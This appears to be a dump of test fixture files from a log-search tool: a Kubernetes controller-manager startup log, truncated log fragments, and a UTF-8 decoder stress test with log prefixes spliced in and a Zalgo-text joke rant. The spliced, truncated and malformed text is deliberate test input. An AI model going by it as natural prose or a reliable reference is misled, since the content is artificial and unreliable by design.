 14 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783112       1 flags.go:59] FLAG: --authorization-webhook-cache-unauthorized-ttl="10s"
 15 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783116       1 flags.go:59] FLAG: --bind-address="0.0.0.0"
 16 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783121       1 flags.go:59] FLAG: --cert-dir=""
 17 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783124       1 flags.go:59] FLAG: --cidr-allocator-type="RangeAllocator"
 18 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783128       1 flags.go:59] FLAG: --client-ca-file=""
 19 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783131       1 flags.go:59] FLAG: --cloud-config="/var/lib/kubernetes/aws.config"
 20 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783136       1 flags.go:59] FLAG: --cloud-provider="aws"
 21 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783139       1 flags.go:59] FLAG: --cloud-provider-gce-lb-src-cidrs="130.211.0.0/22,209.85.152.0/22,209.85.204.0/22,35.191.0.0/16"
 22 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783156       1 flags.go:59] FLAG: --cluster-cidr="10.200.0.0/16"
 23 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783162       1 flags.go:59] FLAG: --cluster-name="kubernetes"
 24 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783166       1 flags.go:59] FLAG: --cluster-signing-cert-file=""
 25 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783170       1 flags.go:59] FLAG: --cluster-signing-duration="8760h0m0s"
 26 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783174       1 flags.go:59] FLAG: --cluster-signing-key-file=""
 27 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783178       1 flags.go:59] FLAG: --cluster-signing-kube-apiserver-client-cert-file=""
 28 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783181       1 flags.go:59] FLAG: --cluster-signing-kube-apiserver-client-key-file=""
 29 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783185       1 flags.go:59] FLAG: --cluster-signing-kubelet-client-cert-file=""
 30 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783188       1 flags.go:59] FLAG: --cluster-signing-kubelet-client-key-file=""
 31 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783191       1 flags.go:59] FLAG: --cluster-signing-kubelet-serving-cert-file=""
 32 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783195       1 flags.go:59] FLAG: --cluster-signing-kubelet-serving-key-file=""
 33 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783198       1 flags.go:59] FLAG: --cluster-signing-legacy-unknown-cert-file=""
 34 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783201       1 flags.go:59] FLAG: --cluster-signing-legacy-unknown-key-file=""
 35 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783205       1 flags.go:59] FLAG: --concurrent-deployment-syncs="5"
 36 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783211       1 flags.go:59] FLAG: --concurrent-endpoint-syncs="5"
 37 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783215       1 flags.go:59] FLAG: --concurrent-gc-syncs="20"
 38 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783219       1 flags.go:59] FLAG: --concurrent-namespace-syncs="10"
 39 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783222       1 flags.go:59] FLAG: --concurrent-replicaset-syncs="5"
 40 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783226       1 flags.go:59] FLAG: --concurrent-resource-quota-syncs="5"
 41 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783229       1 flags.go:59] FLAG: --concurrent-service-endpoint-syncs="5"
 42 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783237       1 flags.go:59] FLAG: --concurrent-service-syncs="1"
 43 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783241       1 flags.go:59] FLAG: --concurrent-serviceaccount-token-syncs="5"
 44 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783244       1 flags.go:59] FLAG: --concurrent-statefulset-syncs="5"
 45 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783248       1 flags.go:59] FLAG: --concurrent-ttl-after-finished-syncs="5"
 46 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783251       1 flags.go:59] FLAG: --concurrent_rc_syncs="5"
 47 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783254       1 flags.go:59] FLAG: --configure-cloud-routes="true"
 48 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783258       1 flags.go:59] FLAG: --contention-profiling="false"
 49 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783264       1 flags.go:59] FLAG: --controller-start-interval="0s"
 50 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783268       1 flags.go:59] FLAG: --controllers="[*,-csrsigning]"
 51 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783278       1 flags.go:59] FLAG: --deleting-pods-burst="0"
 52 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783282       1 flags.go:59] FLAG: --deleting-pods-qps="0.1"
 53 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783288       1 flags.go:59] FLAG: --deployment-controller-sync-period="30s"
 54 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783292       1 flags.go:59] FLAG: --disable-attach-detach-reconcile-sync="false"
 55 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783296       1 flags.go:59] FLAG: --enable-dynamic-provisioning="true"
 56 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783300       1 flags.go:59] FLAG: --enable-garbage-collector="true"
 57 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783304       1 flags.go:59] FLAG: --enable-hostpath-provisioner="false"
 58 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783307       1 flags.go:59] FLAG: --enable-taint-manager="true"
 59 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783312       1 flags.go:59] FLAG: --endpoint-updates-batch-period="0s"
 60 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783315       1 flags.go:59] FLAG: --endpointslice-updates-batch-period="0s"
 61 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783319       1 flags.go:59] FLAG: --experimental-cluster-signing-duration="8760h0m0s"
 62 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783325       1 flags.go:59] FLAG: --experimental-logging-sanitization="false"
 63 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783329       1 flags.go:59] FLAG: --external-cloud-volume-plugin=""
 64 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783332       1 flags.go:59] FLAG: --feature-gates="RotateKubeletServerCertificate=true,TTLAfterFinished=true"
 65 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783348       1 flags.go:59] FLAG: --flex-volume-plugin-dir="/usr/libexec/kubernetes/kubelet-plugins/volume/exec/"
 66 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783354       1 flags.go:59] FLAG: --help="false"
 67 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783357       1 flags.go:59] FLAG: --horizontal-pod-autoscaler-cpu-initialization-period="5m0s"
 68 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783362       1 flags.go:59] FLAG: --horizontal-pod-autoscaler-downscale-delay="5m0s"
 69 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783366       1 flags.go:59] FLAG: --horizontal-pod-autoscaler-downscale-stabilization="5m0s"
 70 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783370       1 flags.go:59] FLAG: --horizontal-pod-autoscaler-initial-readiness-delay="30s"
 71 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783373       1 flags.go:59] FLAG: --horizontal-pod-autoscaler-sync-period="15s"
 72 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783377       1 flags.go:59] FLAG: --horizontal-pod-autoscaler-tolerance="0.1"
 73 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783384       1 flags.go:59] FLAG: --horizontal-pod-autoscaler-upscale-delay="3m0s"
 74 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783388       1 flags.go:59] FLAG: --horizontal-pod-autoscaler-use-rest-clients="true"
 75 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783391       1 flags.go:59] FLAG: --http2-max-streams-per-connection="0"
 76 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783400       1 flags.go:59] FLAG: --kube-api-burst="30"
 77 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783403       1 flags.go:59] FLAG: --kube-api-content-type="application/vnd.kubernetes.protobuf"
 78 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783408       1 flags.go:59] FLAG: --kube-api-qps="20"
 79 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783413       1 flags.go:59] FLAG: --kubeconfig="/etc/kubernetes/controller-manager.conf"
 80 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783421       1 flags.go:59] FLAG: --large-cluster-size-threshold="50"
 81 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783425       1 flags.go:59] FLAG: --leader-elect="true"
 82 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783429       1 flags.go:59] FLAG: --leader-elect-lease-duration="15s"
 83 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783433       1 flags.go:59] FLAG: --leader-elect-renew-deadline="10s"
 84 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783437       1 flags.go:59] FLAG: --leader-elect-resource-lock="leases"
 85 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783441       1 flags.go:59] FLAG: --leader-elect-resource-name="kube-controller-manager"
 86 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783445       1 flags.go:59] FLAG: --leader-elect-resource-namespace="kube-system"
 87 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783449       1 flags.go:59] FLAG: --leader-elect-retry-period="2s"
 88 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783456       1 flags.go:59] FLAG: --log-backtrace-at=":0"
 89 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783461       1 flags.go:59] FLAG: --log-dir=""
 90 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783464       1 flags.go:59] FLAG: --log-file="/var/log/kube-controller-manager.log"
 91 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783469       1 flags.go:59] FLAG: --log-file-max-size="1800"
 92 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783473       1 flags.go:59] FLAG: --log-flush-frequency="5s"
 93 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783477       1 flags.go:59] FLAG: --logging-format="text"
 94 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783481       1 flags.go:59] FLAG: --logtostderr="false"
 95 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783487       1 flags.go:59] FLAG: --master=""
 96 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783490       1 flags.go:59] FLAG: --max-endpoints-per-slice="100"
 97 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783494       1 flags.go:59] FLAG: --min-resync-period="12h0m0s"
 98 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783498       1 flags.go:59] FLAG: --mirroring-concurrent-service-endpoint-syncs="5"
 99 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783502       1 flags.go:59] FLAG: --mirroring-endpointslice-updates-batch-period="0s"
100 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783507       1 flags.go:59] FLAG: --mirroring-max-endpoints-per-subset="1000"
101 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783511       1 flags.go:59] FLAG: --namespace-sync-period="5m0s"
102 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783515       1 flags.go:59] FLAG: --node-cidr-mask-size="0"
103 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783518       1 flags.go:59] FLAG: --node-cidr-mask-size-ipv4="0"
104 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783522       1 flags.go:59] FLAG: --node-cidr-mask-size-ipv6="0"
105 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783525       1 flags.go:59] FLAG: --node-eviction-rate="0.1"
106 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783530       1 flags.go:59] FLAG: --node-monitor-grace-period="40s"
107 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783534       1 flags.go:59] FLAG: --node-monitor-period="5s"
108 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783538       1 flags.go:59] FLAG: --node-startup-grace-period="1m0s"
109 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783541       1 flags.go:59] FLAG: --node-sync-period="0s"
110 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783545       1 flags.go:59] FLAG: --one-output="false"
111 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783549       1 flags.go:59] FLAG: --permit-port-sharing="false"
112 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783553       1 flags.go:59] FLAG: --pod-eviction-timeout="5m0s"
113 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783557       1 flags.go:59] FLAG: --port="10252"
114 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783561       1 flags.go:59] FLAG: --profiling="true"
115 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783565       1 flags.go:59] FLAG: --pv-recycler-increment-timeout-nfs="30"
116 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783568       1 flags.go:59] FLAG: --pv-recycler-minimum-timeout-hostpath="60"
117 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783572       1 flags.go:59] FLAG: --pv-recycler-minimum-timeout-nfs="300"
118 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783576       1 flags.go:59] FLAG: --pv-recycler-pod-template-filepath-hostpath=""
119 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783583       1 flags.go:59] FLAG: --pv-recycler-pod-template-filepath-nfs=""
120 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783587       1 flags.go:59] FLAG: --pv-recycler-timeout-increment-hostpath="30"
121 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783590       1 flags.go:59] FLAG: --pvclaimbinder-sync-period="15s"
122 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783594       1 flags.go:59] FLAG: --register-retry-count="10"
123 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783598       1 flags.go:59] FLAG: --requestheader-allowed-names="[]"
124 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783605       1 flags.go:59] FLAG: --requestheader-client-ca-file=""
125 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783609       1 flags.go:59] FLAG: --requestheader-extra-headers-prefix="[x-remote-extra-]"
126 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783616       1 flags.go:59] FLAG: --requestheader-group-headers="[x-remote-group]"
127 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783624       1 flags.go:59] FLAG: --requestheader-username-headers="[x-remote-user]"
128 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783631       1 flags.go:59] FLAG: --resource-quota-sync-period="5m0s"
129 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783635       1 flags.go:59] FLAG: --root-ca-file="/etc/kubernetes/pki/ca.crt"
130 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783639       1 flags.go:59] FLAG: --route-reconciliation-period="10s"
131 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783643       1 flags.go:59] FLAG: --secondary-node-eviction-rate="0.01"
132 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783648       1 flags.go:59] FLAG: --secure-port="10257"
133 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783652       1 flags.go:59] FLAG: --service-account-private-key-file="/etc/kubernetes/pki/sa.key"
134 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783656       1 flags.go:59] FLAG: --service-cluster-ip-range="10.100.0.0/16"
135 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783660       1 flags.go:59] FLAG: --show-hidden-metrics-for-version=""
136 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783663       1 flags.go:59] FLAG: --skip-headers="false"
137 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783667       1 flags.go:59] FLAG: --skip-log-headers="false"
138 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783671       1 flags.go:59] FLAG: --stderrthreshold="4"
139 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783676       1 flags.go:59] FLAG: --terminated-pod-gc-threshold="12500"
140 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783681       1 flags.go:59] FLAG: --tls-cert-file=""
141 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783684       1 flags.go:59] FLAG: --tls-cipher-suites="[]"
142 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783691       1 flags.go:59] FLAG: --tls-min-version=""
143 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783695       1 flags.go:59] FLAG: --tls-private-key-file=""
144 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783702       1 flags.go:59] FLAG: --tls-sni-cert-key="[]"
145 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783709       1 flags.go:59] FLAG: --unhealthy-zone-threshold="0.55"
146 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783714       1 flags.go:59] FLAG: --use-service-account-credentials="true"
147 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783718       1 flags.go:59] FLAG: --v="2"
148 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783721       1 flags.go:59] FLAG: --version="false"
149 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783729       1 flags.go:59] FLAG: --vmodule=""
150 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783732       1 flags.go:59] FLAG: --volume-host-allow-local-loopback="true"
151 | 2021-07-10T20:27:23.000Z I0710 20:27:23.783736       1 flags.go:59] FLAG: --volume-host-cidr-denylist="[10.0.0.0/16]"
152 | 2021-07-10T20:27:24.000Z I0710 20:27:24.780473       1 serving.go:331] Generated self-signed cert in-memory
153 | 2021-07-10T20:27:25.000Z W0710 20:27:25.671683       1 authentication.go:307] No authentication-kubeconfig provided in order to lookup client-ca-file in configmap/extension-apiserver-authentication in kube-system, so client certificate authentication won't work.
154 | 2021-07-10T20:27:25.000Z W0710 20:27:25.671697       1 authentication.go:331] No authentication-kubeconfig provided in order to lookup requestheader-client-ca-file in configmap/extension-apiserver-authentication in kube-system, so request-header client certificate authentication won't work.
155 | 2021-07-10T20:27:25.000Z W0710 20:27:25.671712       1 authorization.go:176] No authorization-kubeconfig provided, so SubjectAccessReview of authorization tokens won't work.
156 | 2021-07-10T20:27:25.000Z I0710 20:27:25.671736       1 controllermanager.go:176] Version: v1.20.4-eks-6b7464
157 | 2021-07-10T20:27:25.000Z I0710 20:27:25.673359       1 tlsconfig.go:200] loaded serving cert ["Generated self signed cert"]: "localhost@1625948844" [serving] validServingFor=[127.0.0.1,localhost,localhost] issuer="localhost-ca@1625948844" (2021-07-10 19:27:23 +0000 UTC to 2022-07-10 19:27:23 +0000 UTC (now=2021-07-10 20:27:25.673332535 +0000 UTC))
158 | 2021-07-10T20:27:25.000Z I0710 20:27:25.673666       1 named_certificates.go:53] loaded SNI cert [0/"self-signed loopback"]: "apiserver-loopback-client@1625948845" [serving] validServingFor=[apiserver-loopback-client] issuer="apiserver-loopback-client-ca@1625948845" (2021-07-10 19:27:24 +0000 UTC to 2022-07-10 19:27:24 +0000 UTC (now=2021-07-10 20:27:25.673650999 +0000 UTC))
159 | 2021-07-10T20:27:25.000Z I0710 20:27:25.673707       1 secure_serving.go:197] Serving securely on [::]:10257
160 | 2021-07-10T20:27:25.000Z I0710 20:27:25.673734       1 tlsconfig.go:240] Starting DynamicServingCertificateController
161 | 2021-07-10T20:27:25.000Z I0710 20:27:25.674696       1 deprecated_insecure_serving.go:53] Serving insecurely on 127.0.0.1:10252
162 | 2021-07-10T20:28:31.031Z Log file created at: 2021/07/10 20:27:23
163 | Running on machine: ip-10-0-55-213
164 | Binary: Built with gc go1.15.8 for linux/amd64
165 | Log line format: [IWEF]mmdd hh:mm:ss.uuuuuu threadid file:line] msg
166 | 2021-07-10T20:27:25.000Z I0710 20:27:25.674750       1 leaderelection.go:243] attempting to acquire leader lease kube-system/kube-controller-manager...
167 | 


--------------------------------------------------------------------------------
/tests/data/000000.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cado-security/cloudgrep/7f22e3a4f7131d6ecc7693197a2cd78186147278/tests/data/000000.gz


--------------------------------------------------------------------------------
/tests/data/000000.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cado-security/cloudgrep/7f22e3a4f7131d6ecc7693197a2cd78186147278/tests/data/000000.zip


--------------------------------------------------------------------------------
/tests/data/14_3.log:
--------------------------------------------------------------------------------
1 | 2021-08-24T12:16:09.940Z","caller":"awsutils/awsutils.go:583","msg":"Using device number 0 for primary ENI: eni-0114718a8456d2591"}
2 | {"level":"debug","ts":"
3 | SomeLine


--------------------------------------------------------------------------------
/tests/data/26688_17.log:
--------------------------------------------------------------------------------
1 | 2021-08-24T14-32-58.244Z complete response
2 | 


--------------------------------------------------------------------------------
/tests/data/35010_7.log:
--------------------------------------------------------------------------------
1 | 2021-02-05] bpf: Fix verifier jsgt branch analysis on max bound (daniel@iogearbox.net)
2 |   + [9e6de38] [SomeLine


--------------------------------------------------------------------------------
/tests/data/UTF-8-Test.txt:
--------------------------------------------------------------------------------
  1 | 2021-07-07T16:46:30.000Z UTF-8 decoder capability and stress test INFO Starting up agent subsystem INFO [ssm-session-worker]User name,AWS access key,Event time"serviceName": "guardduty""schemaVersion"
  2 | ----------------------------------------
  3 | 
  4 | 
  5 | You can't parse [X]HTML with regex. Because HTML can't be parsed by regex. Regex is not a tool that can be used to correctly parse HTML. As I have answered in HTML-and-regex questions here so many times before, the use of regex will not allow you to consume HTML. Regular expressions are a tool that is insufficiently sophisticated to understand the constructs employed by HTML. HTML is not a regular language and hence cannot be parsed by regular expressions. Regex queries are not equipped to break down HTML into its meaningful parts. so many times but it is not getting to me. Even enhanced irregular regular expressions as used by Perl are not up to the task of parsing HTML. You will never make me crack. HTML is a language of sufficient complexity that it cannot be parsed by regular expressions. Even Jon Skeet cannot parse HTML using regular expressions. Every time you attempt to parse HTML with regular expressions, the unholy child weeps the blood of virgins, and Russian hackers pwn your webapp. Parsing HTML with regex summons tainted souls into the realm of the living. HTML and regex go together like love, marriage, and ritual infanticide. The <center> cannot hold it is too late. The force of regex and HTML together in the same conceptual space will destroy your mind like so much watery putty. If you parse HTML with regex you are giving in to Them and their blasphemous ways which doom us all to inhuman toil for the One whose Name cannot be expressed in the Basic Multilingual Plane, he comes. HTML-plus-regexp will liquify the n​erves of the sentient whilst you observe, your psyche withering in the onslaught of horror. Rege̿̔̉x-based HTML parsers are the cancer that is killing StackOverflow it is too late it is too late we cannot be saved the transgression of a chi͡ld ensures regex will consume all living tissue (except for HTML which it cannot, as previously prophesied) dear lord help us how can anyone survive this scourge using regex to parse HTML has doomed humanity to an eternity of dread torture and security holes using regex as a tool to process HTML establishes a breach between this world and the dread realm of c͒ͪo͛ͫrrupt entities (like SGML entities, but more corrupt) a mere glimpse of the world of reg​ex parsers for HTML will ins​tantly transport a programmer's consciousness into a world of ceaseless screaming, he comes, the pestilent slithy regex-infection wil​l devour your HT​ML parser, application and existence for all time like Visual Basic only worse he comes he comes do not fi​ght he com̡e̶s, ̕h̵i​s un̨ho͞ly radiańcé destro҉ying all enli̍̈́̂̈́ghtenment, HTML tags lea͠ki̧n͘g fr̶ǫm ̡yo​͟ur eye͢s̸ ̛l̕ik͏e liq​uid pain, the song of re̸gular exp​ression parsing will exti​nguish the voices of mor​tal man from the sp​here I can see it can you see ̲͚̖͔̙î̩́t̲͎̩̱͔́̋̀ it is beautiful t​he final snuffing of the lie​s of Man ALL IS LOŚ͖̩͇̗̪̏̈́T ALL I​S LOST the pon̷y he comes he c̶̮omes he comes the ich​or permeates all MY FACE MY FACE ᵒh god no NO NOO̼O​O NΘ stop the an​*̶͑̾̾​̅ͫ͏̙̤g͇̫͛͆̾ͫ̑͆l͖͉̗̩̳̟̍ͫͥͨe̠̅s ͎a̧͈͖r̽̾̈́͒͑e n​ot rè̑ͧ̌aͨl̘̝̙̃ͤ͂̾̆ ZA̡͊͠͝LGΌ ISͮ̂҉̯͈͕̹̘̱ TO͇̹̺ͅƝ̴ȳ̳ TH̘Ë͖́̉ ͠P̯͍̭O̚​N̐Y̡ H̸̡̪̯ͨ͊̽̅̾̎Ȩ̬̩̾͛ͪ̈́̀́͘ ̶̧̨̱̹̭̯ͧ̾ͬC̷̙̲̝͖ͭ̏ͥͮ͟Oͮ͏̮̪̝͍M̲̖͊̒ͪͩͬ̚̚͜Ȇ̴̟̟͙̞ͩ͌͝S̨̥̫͎̭ͯ̿̔̀ͅ
  6 | Markus Kuhn <http://www.cl.cam.ac.uk/~mgk25/> - 2015-08-28 - CC BY 4.0
  7 | 
  8 | This test file can help you examine, how your UTF-8 decoder handles
  9 | various types of correct, malformed, or otherwise interesting UTF-8
 10 | sequences. This file is not meant to be a conformance test. It does
 11 | not prescribe any particular outcome. Therefore, there is no way to
 12 | "pass" or "fail" this test file, even though the text does suggest a
 13 | preferable decoder behaviour at some places. Its aim is, instead, to
 14 | help you think about, and test, the behaviour of your UTF-8 decoder on a
 15 | systematic collection of unusual inputs. Experience so far suggests
 16 | that most first-time authors of UTF-8 decoders find at least one
 17 | serious problem in their decoder using this file.
 18 | 
 19 | The test lines below cover boundary conditions, malformed UTF-8
 20 | sequences, as well as correctly encoded UTF-8 sequences of Unicode code
 21 | points that should never occur in a correct UTF-8 file.
 22 | 
 23 | According to ISO 10646-1:2000, sections D.7 and 2.3c, a device
 24 | receiving UTF-8 shall interpret a "malformed sequence in the same way
 25 | that it interprets a character that is outside the adopted subset" and
 26 | "characters that are not within the adopted subset shall be indicated
 27 | to the user" by a receiving device. One commonly used approach in
 28 | UTF-8 decoders is to replace any malformed UTF-8 sequence by a
 29 | replacement character (U+FFFD), which looks a bit like an inverted
 30 | question mark, or a similar symbol. It might be a good idea to
 31 | visually distinguish a malformed UTF-8 sequence from a correctly
 32 | encoded Unicode character that is just not available in the current
 33 | font but otherwise fully legal, even though ISO 10646-1 doesn't
 34 | mandate this. In any case, just ignoring malformed sequences or
 35 | unavailable characters does not conform to ISO 10646, will make
 36 | debugging more difficult, and can lead to user confusion.
 37 | 
 38 | Please check, whether a malformed UTF-8 sequence is (1) represented at
 39 | all, (2) represented by exactly one single replacement character (or
 40 | equivalent signal), and (3) the following quotation mark after an
 41 | illegal UTF-8 sequence is correctly displayed, i.e. proper
 42 | resynchronization takes place immediately after any malformed
 43 | sequence. This file says "THE END" in the last line, so if you don't
 44 | see that, your decoder crashed somehow before, which should always be
 45 | cause for concern.
 46 | 
 47 | All lines in this file are exactly 79 characters long (plus the line
 48 | feed). In addition, all lines end with "|", except for the two test
 49 | lines 2.1.1 and 2.2.1, which contain non-printable ASCII controls
 50 | U+0000 and U+007F. If you display this file with a fixed-width font,
 51 | these "|" characters should all line up in column 79 (right margin).
 52 | This allows you to test quickly, whether your UTF-8 decoder finds the
 53 | correct number of characters in every line, that is whether each
 54 | malformed sequences is replaced by a single replacement character.
 55 | 
 56 | Note that, as an alternative to the notion of malformed sequence used
 57 | here, it is also a perfectly acceptable (and in some situations even
 58 | preferable) solution to represent each individual byte of a malformed
 59 | sequence with a replacement character. If you follow this strategy in
 60 | your decoder, then please ignore the "|" column.
 61 | 
 62 | 
 63 | Here come the tests:                                                          |
 64 |                                                                               |
 65 | 1  Some correct UTF-8 text                                                    |
 66 |                                                                               |
 67 | You should see the Greek word 'kosme':       "κόσμε"                          |
 68 |                                                                               |
 69 | 2  Boundary condition test cases                                              |
 70 |                                                                               |
 71 | 2.1  First possible sequence of a certain length                              |
 72 |                                                                               |
 73 | 2.1.1  1 byte  (U-00000000):        " "                                        
 74 | 2.1.2  2 bytes (U-00000080):        ""                                       |
 75 | 2.1.3  3 bytes (U-00000800):        "ࠀ"                                       |
 76 | 2.1.4  4 bytes (U-00010000):        "𐀀"                                       |
 77 | 2.1.5  5 bytes (U-00200000):        "�����"                                       |
 78 | 2.1.6  6 bytes (U-04000000):        "������"                                       |
 79 |                                                                               |
 80 | 2.2  Last possible sequence of a certain length                               |
 81 |                                                                               |
 82 | 2.2.1  1 byte  (U-0000007F):        ""                                        
 83 | 2.2.2  2 bytes (U-000007FF):        "߿"                                       |
 84 | 2.2.3  3 bytes (U-0000FFFF):        "￿"                                       |
 85 | 2.2.4  4 bytes (U-001FFFFF):        "����"                                       |
 86 | 2.2.5  5 bytes (U-03FFFFFF):        "�����"                                       |
 87 | 2021-07-07T16:46:30.000Z 2.2.6  6 bytes (U-7FFFFFFF):        "������"                                       |
 88 |                                                                               |
 89 | 2.3  Other boundary conditions                                                |
 90 |                                                                               |
 91 | 2.3.1  U-0000D7FF = ed 9f bf = "퟿"                                            |
 92 | 2.3.2  U-0000E000 = ee 80 80 = ""                                            |
 93 | 2.3.3  U-0000FFFD = ef bf bd = "�"                                            |
 94 | 2.3.4  U-0010FFFF = f4 8f bf bf = "􏿿"                                         |
 95 | 2.3.5  U-00110000 = f4 90 80 80 = "����"                                         |
 96 |                                                                               |
 97 | 3  Malformed sequences                                                        |
 98 |                                                                               |
 99 | 3.1  Unexpected continuation bytes                                            |
100 |                                                                               |
101 | Each unexpected continuation byte should be separately signalled as a         |
102 | malformed sequence of its own.                                                |
103 |                                                                               |
104 | 3.1.1  First continuation byte 0x80: "�"                                      |
